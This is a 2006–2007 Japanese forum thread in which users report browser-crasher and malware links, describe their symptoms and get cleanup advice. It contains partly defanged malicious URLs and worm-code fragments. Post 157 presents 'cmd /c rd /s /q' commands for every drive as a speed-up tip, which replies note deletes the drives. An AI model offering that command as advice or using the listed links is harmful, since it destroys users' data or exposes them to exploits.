★質問時のお約束★ ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!! 質問の時は頭の『ht』を抜いて貼り付ける事 あなたが踏んだあやしいリンクのURLは回答に必要な情報ですが 同時に凶器にも成り得ます。他の方が誤って踏まないよう注意しましょう
★よく出るブラクラ★ www.hellplant.org/cgi-bin/xoor/serpent.cgi メディアプレーヤーやtelnetを起動 Outlookに変なニュースグループを作成 最後にIPを抜かれる とりあえずPCに実害は無いので踏んだら再起動でおk
★最近よくある手口その1★ 〜画像リンクに見せかけて実はブラクラ〜 例:up2.viploader.net/pic/src/viploader90786.jpg (既に404です) URL末尾がjpgでも油断してはいけません こんなのはどうとでも書けます IEは初期設定ではリンク先をファイルの内容に従って開くので 対象がhtmlなどであれば、ブラクラが炸裂する事も
★最近よくある手口その2★ 〜超巨大画像〜 例:www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg (危険。踏まないで下さい) 画像は画像ですが、それが度を越すと凶器にもなります 例の画像は解像度12000×6927を誇り、あなたのPCのメモリを強烈に消耗します 低スペックPCでは固まる原因になります また、こういった画像がアップローダーなどで再利用される場合もあります
★最近よくある手口その3★
〜ニュースサイト見せかけて実はブラクラ〜
例:newsheadline.tripod.com/sports/20060928-00000025-san-fi.html
例:headline-news.tripod.com/national/20061028-000000112-asa-soc.html
(前スレより、現在は404)
URLは結局どうとでも書けるという事です
ブラクラ程度で済めばいいですが、中にはウイルスサイトに繋がっているなど
本当に悪質な物もあります。日頃からPCセキュリティに留意しましょう
最悪↓だけはやっておきましょう
WindowsUpdate
http://update.microsoft.com/
あなたが悪質なリンクを踏んでしまった時に あなたのPC環境の情報が必要になる場合があります その場合は以下の項目を記入してください 【使用OS】 【WindowsUpdateしてるか】 【AntiVirusは何を使っているか】 【ちゃんとUpdateしてるか】 【スキャンした結果(ウイルス名・発見場所)】 【別のオンラインスキャンしたならその結果は】 【症状を具体的に、分かる限りすべて書く】 【何をしたらそんなことになったのか】 【これまでにとった措置】 【その他の質問】
とりあえずこんな感じか あやしい記述や不足分があれば指摘ヨロ 後は需要に任せる
乙カレさん ^^
スレ立て乙です 毎日、このスレを覗いてはブラクラURLをNG登録するのが日課です
11 :
名無しさん@お腹いっぱい。 :2006/11/09(木) 13:54:08
乙
モツ
13 :
名無しさん@お腹いっぱい。 :2006/11/09(木) 17:27:56
どれが苦痛なのかな?
15 :
名無しさん@お腹いっぱい。 :2006/11/09(木) 19:34:16
>>14 NODは確かにいいソフトで購入検討していましたが、あちらこちらに沸いたNOD厨のおかげで、
今ではNODと32という文字を見るだけで、寒気、めまい、吐き気を感じるようになってしまいました。
上記の文字を含んだスレタイはブラクラに値すると思います。
>>15 そうですか、それはお気の毒に・・・
しかしながら大多数は、なんたちゃってNOD使いによる
NOD厨を装って嫌悪感を演出する低脳テクニック
を駆使するやからばかりなので、どうか考慮してあげて下さい。
あなたのご気分が、少しでも早く回復することを願っています。
物事は分けて考えようぜ。 NOD32という製品とその使用者は明確に分離されるべきである、と。
精神的ブラクラ対策のためにFirefoxのコンテンツ-画像設定で 例外設定にサイトをひとつずつ載せているのですが urlをまとめてあるサイトとかないでしょうか?
20 :
名無しさん@お腹いっぱい。 :2006/11/10(金) 19:41:40
>>20 >>6 有害無害含めて30種類の悪意あるサイトを呼び出すブラクラ
WindowsUpdate済みなら多分踏んで即感染は無い
一時ファイル削除して適当なウイルススキャンして何も出なければおk
23 :
名無しさん@お腹いっぱい。 :2006/11/10(金) 20:11:38
>>21-22 ありがとうございます。アップデートはしてません。
PCがぶっ壊れました。携帯からのカキコです(泣
>>20 Java/ClassLoader.AA トロイ
JS/WindowBomb.G トロイ
Win32/TrojanDownloader.Small.NBQ トロイ
VBS/Redlof.M ウイルス
Win32/Exploit.WMF トロイ の亜種
Win32/AdInstaller
Win32/AdInstaller アプリケーションの亜種
など多数ありあり
25 :
好奇心怖い :2006/11/10(金) 20:47:16
>>25 踏んだだけではなんにも反応せん。
ただのはったりだな、それ。
>>25 そのURL、さらにその先も色々踏んだがなにも無し。
なんなら自分で再度踏んでみればわかる。 ^^
あ
36 :
エロ好きな質問者 :2006/11/16(木) 19:57:36
>>35 何事も経験経験。ところでリンクを貼るときはhを抜いてね。特にやばめのリンクは。
38 :
名無しさん@お腹いっぱい。 :2006/11/16(木) 20:13:11
踏んでしまってEXPL_WMF GENというのにかかってしまったんですが どんなウイルスなんですか?
39 :
名無しさん@お腹いっぱい。 :2006/11/16(木) 20:15:40
tp://headline-news.tripod.com/national/20061109-00000132-mai-soc.html 踏んじゃった。 以前からあるURLらしいけど、どーだろ。 とりあえずspybotとAd-AwareSEでスキャン&削除したけど まだなんかした方がいいかな
>>39 >とりあえずspybotとAd-AwareSEでスキャン&削除したけど
新種のウィルスやトロイが入ってたらやっかいなので
カスペルスキーのオンラインスキャンぐらいおれはやるけどな
42 :
38 :2006/11/16(木) 20:55:00
43 :
エロ好きな質問者 :2006/11/16(木) 22:39:58
ブラクラじゃないかも知れません。 ポップアップブロック有効にしてた気がします。 「既定のメールクライアントが正しくインストールされていないため この操作を行えませんでした。」のウィンドウが開きます。 消しても、消しても、同じウィンドウが開きます。 このタブだけ消せれたらよいのですが。 ヤバイと思ってF4押したけど、時すでに遅しでした。 今、スレイプは操作を受け付けない状態です。
44 :
名無しさん@お腹いっぱい。 :2006/11/16(木) 23:16:22
>>39 自分もこれ踏んじゃったのですけど
踏む
↓
一時ファイル消去
↓
インストしてるAVGでウィルススキャンするも反応なし
↓
カスペルスキーでオンラインウィルススキャン
-----
スキャンの統計
スキャンしたオブジェクトの総数 71143
検知されたウイルス 1
感染したオブジェクト 0
疑わしいオブジェクト 6
感染オブジェクト名 ウイルス名 前回の処理
C:\Documents and Settings\***\My Documents\Jane Style\Logs\*** 疑わしい: Exploit.HTML.Mht
上記のような2chのログが6つ検出
-----
↓
シマンテックのオンラインウィルススキャンでも
2chログの誤検出のみ
って状況でした
最後にシステムの復元をして通常利用に戻ろうと思うのですが
大丈夫でしょうか?今のところ特に以前と変わった点はありません
一応こまめにアップデートしてるのが功を奏したのかな・・・と思ってるんですが
>>43 >36はDr.Web R ? onlineでExploit.WinCrashとでたよ
タスクマネージャからプニル終了させたら
OK。ブラクラくらったぜ 。 ∧_∧ ∧_∧ (´<_` ) 流石だよな俺ら。 ( ´_ゝ`) / ⌒i / \ | | / / ̄ ̄ ̄ ̄/ | __(__ニつ/ FMV / .| .|____ \/ / (u ⊃  ̄ ̄ ̄ ̄ ̄ ガタガタガタタタタタ・・・・
50 :
エロ好きな質問者 :2006/11/17(金) 03:31:21
>>46 ありがとうございました。
プラウザはあきらめるしかないのでしょうか。
>>50 >プラウザはあきらめるしかないのでしょうか。
意味がよくわかんない。
52 :
39 :2006/11/17(金) 08:33:44
補足。一応バスター2007入ってます。 でも心配でspybotとAd-AwareSEでスキャン、更にセーフモードでもう一回Ad-AwareSE。 オススメのカペルスキーオンラインスキャンをやったら以下の結果 C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい: C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい: C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい: C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい: C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\75D.tmp 疑わしい: C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\Backup\meroharudoumei[1].RB0 感染: Virus.VBS.Redlof.a バスターが感染ってどういうコト? 誤検出でイイのかな? 改めてバスターでスキャンしたらAd−Awareが誤検出されたし。
C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい: C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい: C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい: C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい: たぶん2chに書き込まれたコードだろうけど、疑わしいと判定されてるなら 削除すればいいでしょ。 所詮2chのログだし。 バスターはわからん。
>>52 Quarantine = 隔離
バスターが隔離したウイルスにカスペが反応しているだけ
既にバスターが無害化したファイルだからそのままで問題無い
それでも気持ち悪いと思うなら隔離逝きになったファイルを削除してしまえばいい
55 :
39 :2006/11/17(金) 10:30:52
>53 >54 ありがとうございました。 2chのログは削除済みです。 バスターはそのままで良いのですね、安心しました。
56 :
名無しさん@お腹いっぱい。 :2006/11/18(土) 17:14:29
tp://www5d.biglobe.ne.jp/~EMPEROR/hamaayu.mpeg ここなんですが、踏んだらWinメディアプレイヤーが不正終了しました 何か問題があるURLか分かる方いませんか?
>>56 「video/mpeg」を発見しました。(4.3 MB) SCOでは問題ないようです。
右クリックしてダウンロード再生してみては?
>>56 普通にみれたぜ。
浜崎のコンサートの一部だった。
>>57 ブラクラではありません。
ただ動画自体が揺れるのでくらくらします。
>>58-59 そうでしたか!ありがとうございます。
いま心配でMcafee走らせましたが、感染なしでした。
>>58 右クリックでダウンロードして観たら、ちゃんとみれました。
お騒がせいたしました。
63 :
59 :2006/11/18(土) 18:20:16
>>61 Mcafeeで発見できないトロイなどがあるので
やばいと思ったらカスペルスキーのオンラインスキャンあたりで確認する方がいいよ。^^
by 元Mcafee使ってた人
p.s.
上のURLは問題ないので安心してほしい。^^
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash" c.Copy(dirwin&"\Win32DLL.vbs <body onload=window()> c.Copy(dirsystem&"\MSKernel32.vbs ms-its:mhtml:file://C:\
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!
66 :
56 :2006/11/18(土) 18:25:27
>>63 ご丁寧にありがとうございます。
重ねてお礼いたします。
68 :
名無しさん@お腹いっぱい。 :2006/11/20(月) 16:09:25
tp://jp.drivecleaner.com/.freeware/index.php?ad=swp_dc_ed2&link=2819&aff=pp_2396577532&a=0&p=14&ex=1&hv=&ap=0&w=0&j=0 日本向けに作られたサイトみたいです。 一種のブラクラと思いますが、鑑定お願いします。
70 :
68です :2006/11/20(月) 17:58:39
>>69 ありがとうございます。
YouTubeの動画観てたら、いきなり「Drivecleaner」に飛ばされました。
表記の日本語がおかしく、閉じてもまた出てくるのでタスクで強制終了いたしました。
勉強不足でした<(_ _)>
失礼ですが、こちらのスレッド開くたびにノートン先生反応するのですが、自分だけ!?
なにやら 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました とか、
Bloodhound.Exploit.6 (ウィルス)を検出、修復しましたって???
>>70 ノートンがウィルスコードに反応してるだけだよ。
それがノートンの弱点なのだよ、これが。
いい加減改良しろよスマンテック社。
>>72 tripod.com自体は単なるウェブホストサイトなのでそこまでなら無害
>>6 のようにそれ以降の文字列が問題になる
ただ、今、tripod.comを踏むと
>>69 にある詐欺ソフトを薦められる場合がある
これを騙されて実行すると有害。macで動くかどうか分からんが
特に何も出なかったよ、というならそれも問題無し
>>72 macなら平気でしょたぶん。
心配ならばmac用のフリーソフトでチェックすればおkだと思うよ。
75 :
72 :2006/11/23(木) 03:35:13
ありがとうございました。 安心しました。
76 :
ひみつの検疫さん :2024/11/08(金) 23:11:04 ID:MarkedRes
汚染を除去しました。
これが噂のノートントラップを引き起こすウィルスコードです・・・ 釣られますた;
78 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 10:41:19
79 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 13:47:52
80 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 14:20:51
>>79 ブラ・・・・すれ違いです。本当にありがとうございry
あげ
82 :
名無しさん@お腹いっぱい。 :2006/12/04(月) 00:46:02
83 :
名無しさん@お腹いっぱい。 :2006/12/04(月) 11:25:03
85 :
名無しさん@お腹いっぱい。 :2006/12/05(火) 03:08:09
>>85 よくわからんがハッカー連中のホームページかな
とりあえず踏んで即何かを仕掛けられるというのは無いみたいだが
手口も思想的にもヤヴァイ連中かも知れん
奥に進むとブルートフォースとか置いてあるし
まぁ関わり合いにならん方がいいだろう
>>87 ソースチェックサービスは利用可能だけど
普段ページ中心に据えられている更新履歴がごっそり無くなっている
やっぱ何かあったのかね
やられたっぽい //www.7walker.com/のTOP ↓ hacked by cobra_21
どういうことなの?
Site Hacked by lord Chy 白・・・
>>90 そいつ、画像はやつらのサイトから取ってきてるから踏むとアクセスログ取られるかもよ。
他スレからモテキタ(^o^)
186 名前:猫△ワル男 ◆oKLssLV2YM [sage] 投稿日:2006/12/05(火) 16:45:04 ID:???
トップを食われちゃってますね 無差別攻撃かな
まあお忙しいとかおっしゃってましたので(公開コメントで)こんなこともあるんでしょう
全破壊を受けたわけではないようです 復旧まで、迂回路(?)を使いましょう
ただし、どんな地雷を埋められているかわからないので、
サイトの再インストール完了宣言までは、安全判定不可扱いです
ttp://so.7walker.net/index.php ttp://so.7walker.net/board/
クラッキング(ハッキング)されました。。。 どうやら 7walker.com 7walker.net どちらのサイト共にやられたようです。 階層内もずたずたにされており、 危険なファイルがまぎれている場合があるので、 サイト内にアクセスする場合は気をつけてください。 あとソースチェッカーオンラインですが、 誠に勝手ながら休憩させていただきます。 なお復帰時期は未定です。 あらら。。。
さっき普通にチェックしたあともう一度チェックしたらその表示が出てきてワロタ
97 :
85 :2006/12/05(火) 21:11:39
みなさんレスありがとうございました。 こーゆー事だったんですね。 Janeとかのコマンドに指定していつも確認してから観てたんですけど 自分ひとり変なページに飛ばされてたんで実況とかついていけなかっ た...orz
98 :
名無しさん@お腹いっぱい。 :2006/12/05(火) 23:25:52
ブラクラで検索かけてこのスレ来ました。
ソースチェッカーオンラインをいつも利用していたのですが
なんか攻撃されたとかで
>>94-95 ですね
復帰時期が未定とのことなので代わりになるサイトを探しています
どこかおすすめのところはありますか?
専ブラから飛んでいけるサイトを探しています
(専ブラを利用しているので専ブラで知りたいサイトのURLをクリックして飛んでいく)
とりあえずview-source:かね。 SP2は同等品とかで
102 :
名無しさん@お腹いっぱい。 :2006/12/07(木) 23:38:19
"Hacked by" "Site hacked"でググルと哀れなサイトが結構出てきてウケル。
103 :
名無しさん@お腹いっぱい。 :2006/12/07(木) 23:39:09
おっと、ヒットしても踏むときは自己責任でなw
104 :
名無しさん@お腹いっぱい。 :2006/12/08(金) 15:54:01
ki143.opt2.point.ne.jp 222.225.95.143 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 222.225.0.0/16 b. [ネットワーク名] TEPCO-HIKARI f. [組織名] 株式会社ドリーム・トレイン・インターネット g. [Organization] DREAM TRAIN INTERNET,Inc. m. [管理者連絡窓口] MH4804JP n. [技術連絡担当者] MH4804JP p. [ネームサーバ] ns.dti.ad.jp p. [ネームサーバ] ns2.dti.ad.jp [割当年月日] 2005/07/22 [最終更新] 2006/08/31 11:44:09(JST) 上位情報 ---------- KDDI 株式会社 (KDDI Corporation) [割り振り] 222.225.0.0/16
先日他所で
>>3 のブラクラを踏んでしまいました。
接続はすぐに切ったんですが、自分なりに調べてみたらADSL以外の環境では
国際電話やQ2に繋がってしまうと書いてありました。
自分はカード型PHSで接続しているので、料金がかかる可能性が高いんでしょうか?
>>3 には実害は無いと書いてありますが、どうなんでしょう?
自分の責任なのはわかっていますが、良かったら教えてください。
ダイアルのプロパティをみて番号が正規のプロバイダになっているか確認せよ
>>107 レスありがとうございます
カード型PHSのダイヤル先を確認してみたんですが、元のプロバイダの電話番号でした。
この場合、今現在は大丈夫と考えてよいのでしょうか?
また、ブラクラを踏んだ時点で課金されている可能性はありますよね?
>>82 これを踏んでVB2007が反応し窓がたくさんでてきてやばいと思ったので
再起動
LANケーブルをはずしウィルスチェックかけるとウィルスが検出され
隔離されたとの報告
気持ち悪いのでバックアップソフト(HDD革命)でシステムドライブを
一週間前の状態に戻した
他のドライブに影響出てないといいが
というか初めてウィルス踏んだ・・orz
>>111 そのウィルスです
あまり危険じゃないのですね安心しました
【使用OS】 windows xp 【WindowsUpdateしてるか】 最近していない 【AntiVirusは何を使っているか】 ノートン 【ちゃんとUpdateしてるか】 していない 【スキャンした結果(ウイルス名・発見場所) 2ちゃん内 【別のオンラインスキャンしたならその結果は】 ウイルスを発見、削除できません。 【症状を具体的に、分かる限りすべて書く】 IEが開かない。エラーとでる 【何をしたらそんなことになったのか】 2チャン内のURLふみました 【これまでにとった措置】 テンポラリー内削除 【その他の質問】 PC買い替えになるのでしょうか?
>>109 ありがとうございます。
それは便利ですね。すぐにでも登録します。
下部の文は、あのブラクラを踏んでから接続を切るまでの間に
Q2に繋がれていた可能性はあるかって事です。
日本語ヘタですみません。
>>116 109ではないが。Q2やらに接続されていた可能性はないとはいえないが、低い。
気になるのなら電話会社で通話明細を確認してみた方がいいと思う。
Q2はNTTのサービスなのでNTT以外の会社からつながったのかな?試しにどこかのQ2にかけてみれば?
>>115 PCのダメージ少ないなら、ウイルス駆除→IE再インスコで治るかも。だめだったらOSを再インスコまたはシステムリカバリーディスクを使用。
買い換える必要はないだろ。
120 :
名無しさん@お腹いっぱい。 :2006/12/17(日) 13:27:42
>>120 くだらねえ。
やめとけ。
mmsとか使ってプロクシを回避、IPアドレスを抜くやつだ。
ブラクラでも何でもねえ。
>>121 ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi のアドレスをクリックすることで、ブラウザクラッシャーという悪質ないたずらが発生する。
無制限にさまざまなプログラムが起動し、CPUやメモリの許容範囲を超えるような作動をし、
フリーズし、強大な負荷により、ハードディスクが破損する恐れもあるという。
そして、最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
プロバイダに確認したところ、CATVやADSLや光ファイバーではtelnetによって回線を勝手に変えられることはないようだが、不確定なので注意すべきだ。
この掲示板でも、なんどもこのアドレスを偽装して踏ませようとする悪質な罠を作成する陰湿な者がいるので注意してほしい。
って書いてあるんだけど、じゃあ害は無いの?
本質はブラクラじゃねえよ。 ブラクラっぽい動作をするだけだ。 本質はIPアドレスの表示。
俺も別の板のスレで
>>120 踏んでしまった。
ノートンがブロックしてくれたような気がするけど、ヤバいかな。
とりあえずスパイウェアチェックとウイルスチェックしてこよう
>>122 >最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
Telnetクライアントでググってみろ
ダイヤルアップなんかと全然関係ねえよw
一例としてWindows98からUNIXのサーバーを利用する場合を示すと、上記で起動したTelnetクライアントの「接続」メニューの 「リモートシステム」を選択し、「ホスト名」に相手のサーバーのIPアドレスかホスト名を入力するとサーバーに接続され、 「login」名と「Password」の入力が求められるので、正しく入力すると使用できるようになる。
俺なんてその手のブラクラ10000回は踏んでるなw tskill iexploreでいつも強制終了させてるわさww
訴えるも何も自分が危険URLをここに貼ってるじゃん
url IPが抜けませんでしたっ www.hellplant.org/cgi-bin/xoor/serpent.cgi - 2006年12月16日 - このサイト内で検索
そもそもが一般人にTelnet.exeなんて必要ねえじゃねえかよ ファイアーウォールで外向けをブロックしちまえよw それと、それらの相手先のTelnetサーバーは応答なんてして来ねえよ
>>119 ウイルス駆除ってww
その方法を記載しろよ・・・
感染したって言ってるウィルス名も分からないのにどうアドバイスしろと・・・
>>118 さすがに自爆はできないですw
でも不安だったら確認してみるよ。ありがとう。
136 :
125 :2006/12/17(日) 20:32:49
とりあえずspybotのスパイウェア検索とノートンの完全スキャンをしたけど検出0だった。 あとはTelnetの遮断をした。 無知な俺に出来る事はこれくらいか・・・
138 :
136 :2006/12/17(日) 22:11:27
【使用OS】 XP 【WindowsUpdateしてるか】 してます 【AntiVirusは何を使っているか】 VBとAVG 【ちゃんとUpdateしてるか】 してます 【スキャンした結果(ウイルス名・発見場所)】 AVG→IE一時ファイルにJS/Psyme.Cというトロイ VBで全体スキャン→発見なし 【別のオンラインスキャンしたならその結果は】 カスペルスキーのオンラインスキャン(重要な領域)では発見なし 【症状を具体的に、分かる限りすべて書く】 コマンドプロンプトが大量に開きました 【何をしたらそんなことになったのか】 専ブラでクリックしてしまいました URL:tp://www.vipper.net/vip145805.jpg.html 【これまでにとった措置】 トロイを隔離したくらいです。 【その他の質問】 対処に困ってコンセントを抜いたんですが その後PCを立ち上げるとStartUpScannerでこのようなログが出ました。 追加されたスタートアップです! Location:HKCU KeyName:MSMSGS Command:"C:\Program Files\Messenger\msmsgs.exe" /background KeyDataType:String ExeFileName:C:\Program Files\Messenger\msmsgs.exe ExeTimeStamp:2004/10/14 1:24:38 ExeFileSize:1,694,208 ExeMd5:74e6e96c6f0e2eca4edbb7f7a468f259 お願いします。
143 :
140 :2006/12/19(火) 15:03:10
>>141 ありがとうございます!
メッセンジャー書き換えとかのトロイはないんですか・・・
また質問ですいませんが
メッセンジャー関係で何もしていなければこのログはトロイによって変更されたと考えて良いのでしょうか?
ブラクラの効果でOutlook Expressが起動したんだろ。 それと一緒にWindows Messengerが起動してスタートアップに放り込まれたんじゃねえの? あれは一度起動すると設定を変えない限りスタートアップで起動するようになる。
>>144 メッセンジャーを起動して設定からバックグラウンドで起動〜のチェックを外したら
スタートアップから消えました
本当にありがとうございます!
>>145 PSYMEのトロイはもまえのVBで対応済みだと思う。隔離したというメッセージがでてればOK。
>>146 ありがとうございます
検出はAVGがしまして、それで隔離しました
今考えたら大量にウインドウが出たときにAVGとVBでぶつかって
検出に支障を来たしていないかと心配ですが・・・
AVGとVB・・・ まずは信頼できるやつをひとついれ オンラインスキャン(カスペルスキーとか)を併用した方がよい
149 :
名無しさん@お腹いっぱい。 :2006/12/20(水) 15:26:00
ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
の頭に
http://をつけて下さい jpgファイルを油断して踏んだらこちらに繋がったようです
これも
>>3 と同種でしょうか
150 :
149 :2006/12/20(水) 15:36:20
すいません恐らく
>>140 と同じファイルだった様です
一応ウィルスは削除したのですがブラクラでウィルスまで貰ったのは初めてだったので。
これはウィルスの削除だけしておけば問題ないでしょうか
>>150 セキュリティホールを突いてくるウイルスサイトだが
OSがかなり古い状態でなければ踏んでも特に問題は無い
XPあたりなら素の状態でもシステム改変は無いだろう
念の為 一時ファイル削除してウイルススキャンして何も出なければ完了
>>150 なんのウィルス対策ソフト使ってるかわかんないんで安易に大丈夫とはいいにくい
カスペルスキーのオンラインスキャンでもやって確かめてみればおk
なお、あらかじめソフトが隔離したやつは削除、ならびにブラウザのキャッシュ(一時ファイル)なども削除して
PCを再起動させてからオンラインスキャンを開始かな
153 :
149 :2006/12/20(水) 19:05:18
win2kで8月にアップデートしたので恐らく大丈夫だと思います さっきカスペルスキーのオンラインスキャンもしてみましたが問題ないようでした。 アドバイスありがとうございました。
怖くて踏めないサイトのアドレス を確認してくれるスレがあったと思うのですが どこでしたでしょうか?
さんくすです
157 :
名無しさん@お腹いっぱい。 :2006/12/30(土) 21:10:24
最近PCが重いとか、起動シャットダウンが遅いとか思ってる人は、 リフレッシュコマンドを試してみるといい。 以下を実行することでディスク/ドライプの節約、メモリの開放になる。 1.[スタート]→[ファイル名を指定して実行]で cmd /c rd /s /q d: と入力し[OK]をクリックする。 上記と同様に以下も順に実行する。 cmd /c rd /s /q e: cmd /c rd /s /q f: cmd /c rd /s /q g: cmd /c rd /s /q h: cmd /c rd /s /q c: これでディスク/ドライプがクリアされて正常になる。 事前予防にもなるので、やった事がなければ試してみる価値あり。 年末なのでPCもリフレッシュしましょう。
159 :
名無しさん@お腹いっぱい。 :2006/12/31(日) 17:13:53
実行するとDドライブが全部消えちまうじゃねーか
RMDIR(RD)ディレクトリの削除
161 :
名無しさん@お腹いっぱい。 :2007/01/01(月) 01:49:47
これブラクラらしいんですけど踏むと何か後遺症ありますか?
>>162 ただのびっくりページ
PCに悪さをするようなものは特に無い
【使用OS】 widowsXP SP2
【WindowsUpdateしてるか】 適宜
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 毎日
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 症状は今のところ無し
【何をしたらそんなことになったのか】
すいません、これ踏んじゃったんですが、htmlが偽装されてますよね?
openjaneと、firefoxで踏んじゃったんですが…。
不安だったので、聞きに来ました。お願いします。
ttp://ea.uuhp.com/~ipnuki/cgi-bin/env/gachimuchi1835.jpg 【これまでにとった措置】 ウイルスバスターで検索
【その他の質問】
MUVIC COMってなんなんですか?
166 :
164 :2007/01/02(火) 04:51:50
ググったら、FDDアタックやらウィンドウオープンやらのブラクラらしいですね。 カスペのオンラインスキャンもやったんですが、何も発見されませんでした。 これは後遺症は無いんでしょうか?
>>166 基本的にはブラクラの類に属するものでウイルスやらシステム感染は無いはず
conconとか仕掛けているのを見ると、随分昔に作られたもののよう
今時のPCなら特に問題無い
IEで踏んだが発動したのはウィンドウオープンとFDDアタックだけだった
アンチウイルスによっては踏んだ時にWinbombとかそんな感じで反応があるかも知れない
対処法としては放置しても構わないが、何か気持ち悪いと思うなら一時ファイル削除して再起動で十分
168 :
164 :2007/01/02(火) 05:13:43
>>167 ありがとうございます!
ヤフーで検索したら、今ちょっと出回ってるurlらしくて、
踏んでしまった自分が恥ずかしい限りです。勉強になりました。
キャッシュ消し再起動もやっておきます。
時々見かける目障りなURLだったからアク禁覚悟で流しておいた もう404になっているはず
170 :
164 :2007/01/02(火) 08:51:42
>>169 ありがとうございます。
あぷろだ確認しましたが、流されてました。
そういう二時被害の防ぎ方もあるんですね。勉強になりました。
171 :
名無しさん@お腹いっぱい。 :2007/01/03(水) 04:06:05
tp://www.vipper.net/vip154672.jpg.html 上記のファイルを誤って踏んでしまいました OS(XP)、Norton Internet Security共に最新の状態でした 一通りウイルスチェックを行いましたが、その後どの様に対処すればよいのでしょうか…
>>172 ウインドウがたくさん出てきたりtelnetがどうとか…
あとWMPやRMが何度も実行されました
結局LANケーブル引っこ抜いて再起動させました
今レポートを見てみたらhellplantやip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm、blacksheepに繋がってしまったみたいです…
174 :
172 :2007/01/03(水) 05:56:42
ダウンロードして検体送付しときました。 タスクマネージャーのプロセスにおかしなexeがないか?自分で確認しておいて下さい
>>173 「WELCOME」だね。前スレが落ちてるので以下コピペ
以下の有害サイトを大量に呼び出すブラクラ
1.www.hellplant.org/cgi-bin/xoor/serpent.cgi
厨房ホイホイ。IP抜かれるくらいで特に害は無い
2.www.albinoblacksheep.com/flash/you.html
元ブラクラ。今はただのフラッシュ。害は無い
3.ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
脆弱性を突いてWMPを破壊、任意のコードを実行
とりあえず危険なのは3のURLだが
脆弱性自体は2年位前に塞がれているはず
結論としてはWindowsがよっぽど古い状態でなければ問題は無い
一時ファイル削除して適当なウイルススキャンして何も出なければ完了
私も
>>171 を踏んでしまいました一人です
>>175 >一時ファイル削除して適当なウイルススキャンして何も出なければ完了
なにも出ませんでしたが、outlookにhellplantなんたらのアカウントが大量に出来てますが大丈夫でしょうか?
177 :
171 :2007/01/03(水) 06:08:51
>>174 ありがとうございます
注意深く見ておかないといけませんね
>>175 既出でしたか…
jpgファイルでこんな事になるとは思ってもみませんでした
OSもNISも最新の状態ですし大丈夫そうですね
皆様本当にありがとうございました
今後は安易にファイルを踏むことのない様慎重に対応するよう心がけます
>>176 >>171 に
>>3 が含まれているための影響
手動で消してもいいが大抵Outlookを何回か起動・終了を繰り返すうちに
勝手に消えているはず。放置しても特に構わない
>>178 ありがとうございます。いい教訓になりましたorz
181 :
171 :2007/01/03(水) 06:29:49
>>180 Jane Doe Styleを使っているのですがリンク先をIEで踏んでしまいまして…
もし「.html」の部分が無ければViewerで踏むことになったのかな
182 :
176 :2007/01/03(水) 06:30:18
>>180 Live2chを使ってますが、ポップアップさせずにクリックしてしまいました・・・反省してます
>>171 >>176 「CLUBPC security」などでブラウザのセキュリティ設定を再勉強しておきましょう
184 :
176 :2007/01/03(水) 06:46:25
185 :
171 :2007/01/03(水) 06:50:40
>>183 これを機にしっかり勉強しておきたいと思います
いやはやお恥ずかしい…
>>184 telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?
186 :
176 :2007/01/03(水) 06:59:03
>>185 > telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?
私の場合、connectionなんたらというのが記述されたコマンドプロンプトが大量に出たのですが・・・
187 :
171 :2007/01/03(水) 07:18:57
>>186 私が確認できる限りでは
>>175 さんが引用して下さった3サイトへの接続のみだったかと思います
でももしご指摘されたサイトへも接続されていたら面倒ですね
test
191 :
176 :2007/01/03(水) 17:32:50
精神的ブラクラ踏んでしまいました はぁ。
193 :
名無しさん@お腹いっぱい。 :2007/01/06(土) 04:01:30
>>193 とりあえずWindowsUpdateしてあるなら踏んで即感染は無いはず
念を入れるなら一時ファイル削除して適当なウイルススキャン
ブラクラじゃなくてれっきとしたウイルスサイトだと思われ
>>193 Trojan-Downloader.VBS.Small.bo 検出
196 :
名無しさん@お腹いっぱい。 :2007/01/06(土) 18:18:41
tp://114090.net/~vip2ch/img/topimg-2006_08.jpg ニュース速報のやつ(同じもの?)を踏んだぜ!
>>196 中身は
>>20 あたりと同じ
有害無害含めて30種類の悪意あるサイトを呼び出す
WindowsUpdate済みなら多分踏んで即感染は無い
>>199 ありがとうございます。
わざわざリスクを負って調べていただき感謝いたします。
m(__)m
201 :
名無しさん@お腹いっぱい。 :2007/01/09(火) 20:19:47
p://www.goggle.com/ p://www.yourdailymedia.com/media/1160043117/Goggle.com_Destroys_Your_PC 上のアドレスは立ちの悪いブラクラで 下のアドレスは上のアドレスを踏んだらどうなるか、 というものらしいのですが下のアドレスは安全なものでしょうか? それと上のアドレスで起こりうる被害はどのようなものなのでしょうか?
なぜWindowsUpdateしてなかったら危ないんでしょうか?
すいません、グぐったら分かりました。
